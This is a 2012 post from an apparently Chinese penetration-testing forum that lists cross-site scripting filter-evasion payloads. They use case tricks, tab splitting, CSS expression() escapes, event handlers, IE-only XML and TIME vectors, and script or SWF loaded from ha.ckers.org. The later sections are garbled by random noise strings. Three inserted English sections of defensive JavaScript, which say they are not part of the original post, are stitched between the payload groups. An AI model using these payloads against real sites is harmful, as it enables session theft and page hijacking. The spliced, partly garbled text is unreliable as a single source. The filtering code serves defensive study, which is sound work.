中国网络渗透测试联盟 (China Network Penetration Testing Alliance)

Title: Introduction to Cross Site Scripting (XSS) attack techniques

Author: admin    Time: 2012-12-31 09:59
Title: Introduction to Cross Site Scripting (XSS) attack techniques
1. Change the letter case

    <sCript>alert('d')</scRipT>

2. Add extra characters to evade regular-expression checks

    <<script>alert('c')//<</script>

    <SCRIPT a=">" SRC="t.js"></SCRIPT>

    <SCRIPT =">" SRC="t.js"></SCRIPT>

    <SCRIPT a=">" '' SRC="t.js"></SCRIPT>

    <SCRIPT "a='>'" SRC="t.js"></SCRIPT>

    <SCRIPT a=`>` SRC="t.js"></SCRIPT>

    <SCRIPT a=">'>" SRC="t.js"></SCRIPT>

3. Replace the .js extension with another extension

    <script src="bad.jpg"></script>

4. Put the JavaScript in a CSS file

    <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">

       example:

          body {
               background-image: url('javascript:alert("XSS");')
          }

5. Insert other characters into the script tag

    <SCRIPT/SRC="t.js"></SCRIPT>

    <SCRIPT/anyword SRC="t.js"></SCRIPT>
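Why the variants in sections 1, 2 and 5 get past a pattern check, from the filter's side. The following is an added example, not code from the original post: a small model of how a browser tokenizer reads a tag name (the name ends at ASCII whitespace, "/" or ">", and is compared case-insensitively), placed next to the kind of naive regex these payloads are built to evade. The regex and the sample list are constructed for illustration.

```javascript
// Added example (not from the original post). A browser tokenizer ends a tag
// name at ASCII whitespace, "/" or ">" and compares names case-insensitively,
// so "<sCript>", "<SCRIPT/SRC=...>" and "<<script>" all yield the tag "script".
// The regex below stands in for the kind of naive filter these variants evade.

const TAG_NAME_END = /[\t\n\f\r />]/;

// Read a tag name starting at markup[start] === "<", returning it lower-cased.
function readTagName(markup, start) {
  let i = start + 1;
  let name = '';
  while (i < markup.length && !TAG_NAME_END.test(markup[i])) {
    name += markup[i];
    i += 1;
  }
  return name.toLowerCase();
}

// Collect the start-tag names in a fragment. A "<" not followed by an ASCII
// letter is emitted as text, so in "<<script>" the tag starts at the second "<".
function tagNames(markup) {
  const names = [];
  for (let i = 0; i < markup.length; i += 1) {
    if (markup[i] === '<' && /[A-Za-z]/.test(markup[i + 1] || '')) {
      names.push(readTagName(markup, i));
    }
  }
  return names;
}

// Naive filter: case-sensitive, and only recognises a space or ">" after the name.
function naiveFilterMatches(markup) {
  return /<script[ >]/.test(markup);
}

// Tokenizer-aware check: compare the name the browser will actually see.
function containsScriptTag(markup) {
  return tagNames(markup).includes('script');
}

// Constructed samples, taken from the evasions listed above.
const SAMPLES = [
  "<sCript>alert('d')</scRipT>",
  "<<script>alert('c')//<</script>",
  '<SCRIPT/SRC="t.js"></SCRIPT>',
  '<SCRIPT/anyword SRC="t.js"></SCRIPT>',
];

// Returns, per sample, whether the naive filter and the tokenizer-aware check fire.
function compareChecks(samples = SAMPLES) {
  return samples.map((s) => ({
    sample: s,
    naive: naiveFilterMatches(s),
    tokenizer: containsScriptTag(s),
  }));
}

for (const r of compareChecks()) {
  console.log(`${r.naive ? 'naive hit ' : 'naive MISS'} | tokenizer ${r.tokenizer ? 'hit' : 'MISS'} | ${r.sample}`);
}
```

Run under Node: the naive regex fires on only one of the four samples, the tokenizer-aware check on all four. The practical lesson is that a filter has to make its decision on the tag name as the parser will interpret it (or, better, rebuild the markup from an allowlist of parsed elements) rather than on the raw text.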
6. Use tabs or newlines to evade (the spaces shown inside "javascript" below stand for a tab or a newline)

    <img src="jav ascr ipt:alert('XSS3')">

    <img src="jav ascr ipt:alert('XSS3')">

    <IMG SRC="jav ascript:alert('XSS');">

         -> tab

         -> new line

7. Use "\" to evade

    <STYLE>@im\port'\ja\vasc\ript:alert("XSS32")';</STYLE>

    <IMG STYLE='xss:expre\ssion(alert("XSS33"))'>

    <IMG STYLE="xss:expr/*anyword*/ession(alert('sss'))">

    <DIV STYLE="width: expre\ssi\on(alert('XSS31'));">

    <A STYLE='no\xss:noxss("*//*"); xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
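The backslash and comment tricks in section 7 work because CSS resolves escapes and drops comments before it sees an identifier, so a keyword check on the raw attribute text sees "expre\ssi\on" while the engine sees "expression". The following is an added example, not code from the original post: a normalizer that applies the same two steps and then matches keywords on the result. The keyword list is an illustrative assumption, and the comment stripper is deliberately simplified (it does not track quoted strings).

```javascript
// Added example (not from the original post). CSS resolves backslash escapes
// and drops /* */ comments before it sees an identifier, so a keyword check
// has to run on the normalized value, not on the raw attribute text.

// Resolve CSS backslash escapes: "\" + 1-6 hex digits (+ one optional
// whitespace) is a code point; "\" + any other character is that character,
// which is why "expre\ssi\on" reads as "expression".
function unescapeCss(value) {
  return value.replace(/\\(?:([0-9a-fA-F]{1,6})[ \t\n\r\f]?|([\s\S]))/g, (match, hex, ch) => {
    if (hex !== undefined) {
      const code = parseInt(hex, 16);
      // NUL and out-of-range escapes become U+FFFD, as in the CSS syntax spec.
      return code === 0 || code > 0x10ffff ? '\uFFFD' : String.fromCodePoint(code);
    }
    return ch;
  });
}

// Remove /* ... */ comments. Simplification: a real tokenizer does not open
// a comment inside a quoted string; this version does.
function stripCssComments(value) {
  return value.replace(/\/\*[\s\S]*?\*\//g, '');
}

// Order matters: comments split identifiers, escapes rebuild them, then case-fold.
function normalizeCssValue(value) {
  return unescapeCss(stripCssComments(value)).toLowerCase();
}

// Keyword patterns that have no place in user-supplied style values (from the
// techniques listed above: IE expression(), @import, javascript: URLs).
const DANGEROUS_CSS = [/expression\s*\(/, /@import/, /javascript\s*:/];

function isDangerousCss(value) {
  const norm = normalizeCssValue(value);
  return DANGEROUS_CSS.some((re) => re.test(norm));
}

// Constructed samples taken from the list above (straight quotes).
const STYLE_SAMPLES = [
  "width: expre\\ssi\\on(alert('XSS31'));",
  "xss:expr/*anyword*/ession(alert('sss'))",
  "@im\\port'\\ja\\vasc\\ript:alert(\"XSS32\")';",
  'color: #ff0000; width: 10px',
];

for (const s of STYLE_SAMPLES) {
  console.log(isDangerousCss(s) ? 'BLOCK' : 'allow', '|', normalizeCssValue(s));
}
```

The last payload in section 7 hides "/*" inside a quoted string, which this simplified stripper mis-handles; a production check should tokenize the value with a real CSS parser (or refuse untrusted style attributes outright, which is the usual choice) rather than extend the regex.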

- V. Y7 l9 T6 O8. 使用Hex encode来规避(也可能会把";"拿掉)% [9 T( c! x2 y0 a9 K
8 w8 r1 m4 A3 J0 G9 i; `
    <DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">: V' B; q  w$ v7 O5 |- g6 J
  J& E) s" G  k4 r  B; c
        原始码:<DIV STYLE="width: expre\ssi\on(alert(‘XSS31′));">
0 G* ~2 J% B5 z1 R
  {+ G. \% J/ N- ]) ^! ]( r$ Z    <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">
( T" Q1 ]7 ]/ O3 U. l7 Z  b8 h3 `- B9 ~2 Q, t9 Q4 i
        原始码:<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert(‘abc’);">8 ?- p0 z( f( ]- }; Y% w
/ X: K  B5 w, C% B
9. script in HTML tag( o# n8 T; m6 P' k4 Y; i  D
5 c$ B/ h# E! M4 ~2 l6 a
    <body onload=」alert(‘onload’)」>- @( g8 d( s/ ]1 z' k$ Y! Y
9 h* S/ R% e% d& `) l
        onabort, onactivate, onafterprint, onafterupdate, onbeforeactivate, onbeforecopy, onbeforecut, onbeforedeactivate, onbeforeeditfocus, onbeforepaste, onbeforeprint, onbeforeunload, onbeforeupdate, onblur, onbounce, oncellchange, onchange, onclick, oncontextmenu, oncontrolselect, oncopy, oncut, ondataavailable, ondatasetchanged, ondatasetcomplete, ondblclick, ondeactivate, ondrag, ondragend, ondragenter, ondragleave, ondragover, ondragstart, ondrop, onerror, onerrorupdate, onfilterchange, onfinish, onfocus, onfocusin, onfocusout, onhelp, onkeydown, onkeypress, onkeyup, onlayoutcomplete, onload, onlosecapture, onmousedown, onmouseenter, onmouseleave, onmousemove, onmouseout, onmouseover, onmouseup, onmousewheel, onmove, onmoveend, onmovestart, onpaste, onpropertychange, onreadystatechange, onreset, onresize, onresizeend, onresizestart, onrowenter, onrowexit, onrowsdelete, onrowsinserted, onscroll, onselect, onselectionchange, onselectstart, onstart, onstop, onsubmit, onunload7 m* y: j- X  F$ Y( f5 M
2 g0 C; t9 ?( I. l7 @
10. 在swf里含有xss的code
4 A9 x9 O' C6 A9 T
2 [  q( j; W  F% {. v0 k    <EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>$ D0 _1 [5 @7 U- l

2 b3 B$ v8 [& j1 \. l3 }11. 利用CDATA将xss的code拆开,再组合起来。
/ E! Q2 F# `' C  I% J4 F* R2 M$ [% d
    <XML ID=I><X><C>
8 i' X4 O8 X% N' w( Y1 |3 j8 ?
9 _1 p- R+ h6 a! V; u# V    <![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]>; E8 c0 F. m; h5 j
% A6 L7 }9 f+ h/ X& P- {9 O) {
    </C></X>6 S# t( l; L5 a! ~- G7 b
# a) b; B* C% t' ?8 M6 |6 A- _$ ^
    </xml>
* I: w8 y) O! U- l
3 y- r- K8 ?* C3 Z2 u$ \' h    <SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>$ a! i- T' K% W/ G; l  D4 A' d6 `
8 C& Q/ X: I' V2 a2 I" R% S# ~
    <XML ID="xss"><I><B><IMG SRC="javas<!– –>cript:alert(‘XSS’)"></B></I></XML>. r* A4 ~: C. |5 T
. K9 L! @% J9 r3 E" H# e
    <SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>% {# G6 ^3 f* ~1 q7 L% J
0 F" K/ h# |$ ?. `; }5 F% l3 D
12. 利用HTML+TIME。* ~  G$ T& E3 y5 e3 y# H

, @7 i9 Z! x0 F5 A    <HTML><BODY>
# R, D4 n: @0 k3 |% [! l3 x
" E+ w/ D0 @/ \- V    <?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time">
1 e% T& I: g5 H6 v; p3 Y
, u5 t. |$ w0 ^$ r4 k) E    <?import namespace="t" implementation="#default#time2">/ h0 t" w5 e2 `0 @3 z& Y. {# l
6 h1 w5 U# C: D9 g4 r" _
    <t:set attributeName="innerHTML" to="anyword<SCRIPTDEFER>alert("XSS")</SCRIPT>">
9 l* z, l9 k/ F
, E1 S) w6 G1 B7 t- F& P" q    </BODY></HTML>
  i- u: N4 B+ W2 A8 a# r
8 `: [% i2 F# ~/ M# s13. 透过META写入Cookie。. ?# F5 o9 D) U) q4 A3 E

! T, N: ^/ v- B. p/ s: z4 J    <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert(‘XSS’)</SCRIPT>">- z0 X% G( |  z5 Z4 q) t/ j% ]* S
' A$ G$ w* v  H! b
14. javascript in src , href , url; k5 V9 G# X6 @. a& _
# _7 N5 ?3 i9 c7 R# t
    <IFRAME SRC=javascript:alert(’13′)></IFRAME>9 }- L! m1 v" d: f! L* ?

0 @7 A8 q1 c9 ]- A    <img src="javascript:alert(‘XSS3′)">
$ J8 g! P# x: i# j8 }0 D0 I  Z+ C
: C" a' y, Q" f0 d* V5 y/ A5 ~<IMG DYNSRC="javascript:alert(‘XSS20′)">+ \) t6 t' O1 F/ i6 n* w

( M" c$ q, h% i' F% U0 E. j! N$ H    <IMG LOWSRC="javascript:alert(‘XSS21′)">
8 z3 j( W2 o% _8 g
+ @6 N+ P" b. F$ e( o; i6 [& C0 m  q    <LINK REL="stylesheet" HREF="javascript:alert(‘XSS24′);">
  P5 A" a! r3 C% u, Y( I/ w( U! q5 A8 Q' N
    <IFRAME SRC=javascript:alert(‘XSS27′)></IFRAME>( ?. Q% }: i7 x$ q3 I& s5 F- I
& v  p) H/ k: t' Y# O2 ~8 r
    <TABLE BACKGROUND="javascript:alert(‘XSS29′)">1 \5 l& L/ D0 q, z

. d1 V# b1 G. D5 L3 B0 `    <DIV STYLE="background-image: url(javascript:alert(‘XSS30′))">* Y0 ~! T% i4 I" t) `, o

" F: p+ V2 X( F    <STYLE TYPE="text/css">.XSS{background image:url("javascript:alert(‘XSS35′)");}
6 S! S- }7 c: @7 l# q6 G  F4 ?( u+ C6 ?
    </STYLE><A CLASS=XSS></A>
" a0 c& R9 I! v) L6 {) z3 c# [7 e9 d- q) [# W9 I8 X8 h8 `$ b8 l
    <FRAMESET><FRAME SRC="javascript:alert(‘XSS’);"></FRAMESET>
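Sections 6, 8, 9 and 14 are all variations on one theme: a URL-valued or event-handler attribute whose value a browser normalizes (character references decoded, tab/LF/CR removed, leading controls trimmed, case ignored) before acting on it. The following is an added example, not code from the original post: a single allowlist policy for untrusted attributes that performs the same normalization before comparing the URL scheme against an allowlist, refuses any "on*" handler, and refuses the elements and attributes that drive the IE-only techniques in sections 10 to 13. The tag lists, attribute lists and scheme allowlist are illustrative assumptions, as are the sample elements at the bottom.

```javascript
// Added example (not from the original post). One allowlist policy for
// attributes of untrusted markup. URL-valued attributes are normalized the
// way browsers normalize URLs before the scheme is compared with an allowlist.
// The tag, attribute and scheme lists are illustrative assumptions.

const NAMED_REFS = { amp: '&', lt: '<', gt: '>', quot: '"', apos: "'" };

// Decode character references: named (small set), decimal and hexadecimal
// numeric; the trailing ";" is optional because browsers accept both forms.
function decodeEntities(text) {
  return text.replace(/&(?:#x([0-9a-f]+)|#([0-9]+)|([a-z]+));?/gi, (m, hex, dec, name) => {
    if (hex !== undefined) return codePoint(parseInt(hex, 16));
    if (dec !== undefined) return codePoint(parseInt(dec, 10));
    const named = NAMED_REFS[name.toLowerCase()];
    return named !== undefined ? named : m;
  });
}

function codePoint(n) {
  return n === 0 || n > 0x10ffff ? '\uFFFD' : String.fromCodePoint(n);
}

// Browsers drop ASCII tab, LF and CR anywhere in a URL and trim leading and
// trailing C0 controls and spaces, which is what makes "jav\tascript:" work.
function normalizeUrl(value) {
  return decodeEntities(value)
    .replace(/[\t\n\r]/g, '')
    .replace(/^[\u0000-\u0020]+|[\u0000-\u0020]+$/g, '')
    .toLowerCase();
}

// Scheme is the text before the first ":" when that ":" precedes any "/", "?" or "#".
function urlScheme(normalized) {
  const idx = normalized.search(/[:/?#]/);
  if (idx === -1 || normalized[idx] !== ':') return null; // relative URL, no scheme
  return normalized.slice(0, idx);
}

const ALLOWED_SCHEMES = new Set(['http', 'https', 'mailto']);

function isSafeUrl(value) {
  const scheme = urlScheme(normalizeUrl(value));
  return scheme === null || ALLOWED_SCHEMES.has(scheme);
}

// Attributes whose value is a URL, including the legacy IE ones from section 14.
const URL_ATTRS = new Set(['src', 'href', 'dynsrc', 'lowsrc', 'background', 'datasrc']);
// Attributes never accepted from untrusted markup (style would need its own
// CSS-level check; the rest drive the IE-only techniques in sections 10-13).
const DENIED_ATTRS = new Set(['style', 'http-equiv', 'datafld', 'dataformatas', 'allowscriptaccess']);
// Elements never accepted; namespaced ("t:set") and "<?" processing-instruction
// style names are refused by the rule in checkElement.
const DENIED_TAGS = new Set(['script', 'style', 'link', 'meta', 'embed', 'iframe', 'frame', 'frameset', 'xml']);

// Returns 'allow' or a 'deny: ...' reason for a single attribute. Names are
// trimmed and case-folded, which is how the tokenizer sees them.
function checkAttribute(name, value) {
  const n = name.trim().toLowerCase();
  if (n.startsWith('on')) return 'deny: event handler';
  if (DENIED_ATTRS.has(n)) return `deny: attribute "${n}" not allowed`;
  if (URL_ATTRS.has(n) && !isSafeUrl(value)) return 'deny: disallowed URL scheme';
  return 'allow';
}

// Returns the list of problems for an element (empty when it passes).
function checkElement(tag, attrs) {
  const t = tag.trim().toLowerCase();
  const problems = [];
  if (DENIED_TAGS.has(t) || t.includes(':') || t.startsWith('?')) problems.push(`deny: element <${t}>`);
  for (const [name, value] of Object.entries(attrs)) {
    const verdict = checkAttribute(name, value);
    if (verdict !== 'allow') problems.push(`${name}: ${verdict}`);
  }
  return problems;
}

// Constructed samples from the list above.
const ELEMENT_SAMPLES = [
  ['IMG', { SRC: "jav\tascr\nipt:alert('XSS3')" }],
  ['IMG', { DYNSRC: "javascript:alert('XSS20')" }],
  ['a', { href: '&#106;avascript:alert(1)' }],
  ['body', { onload: "alert('onload')" }],
  ['META', { 'HTTP-EQUIV': 'Set-Cookie', Content: 'USERID=x' }],
  ['t:set', { attributeName: 'innerHTML', to: 'anyword' }],
  ['img', { src: 'bad.jpg', alt: 'picture' }],
];

for (const [tag, attrs] of ELEMENT_SAMPLES) {
  const problems = checkElement(tag, attrs);
  console.log(problems.length ? problems.join('; ') : 'allow', '|', `<${tag}>`);
}
```

Two design points worth noting. First, the policy is an allowlist: an unknown scheme such as "jav\0ascript" is refused without anyone having to predict it, whereas a denylist of strings would need a new entry for every encoding trick in sections 6 and 8. Second, section 3 ("<script src=bad.jpg>") shows why checking the file extension of a URL is no substitute for refusing the element that would execute it; the policy above refuses "script" as an element and never looks at the extension.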

Welcome to 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2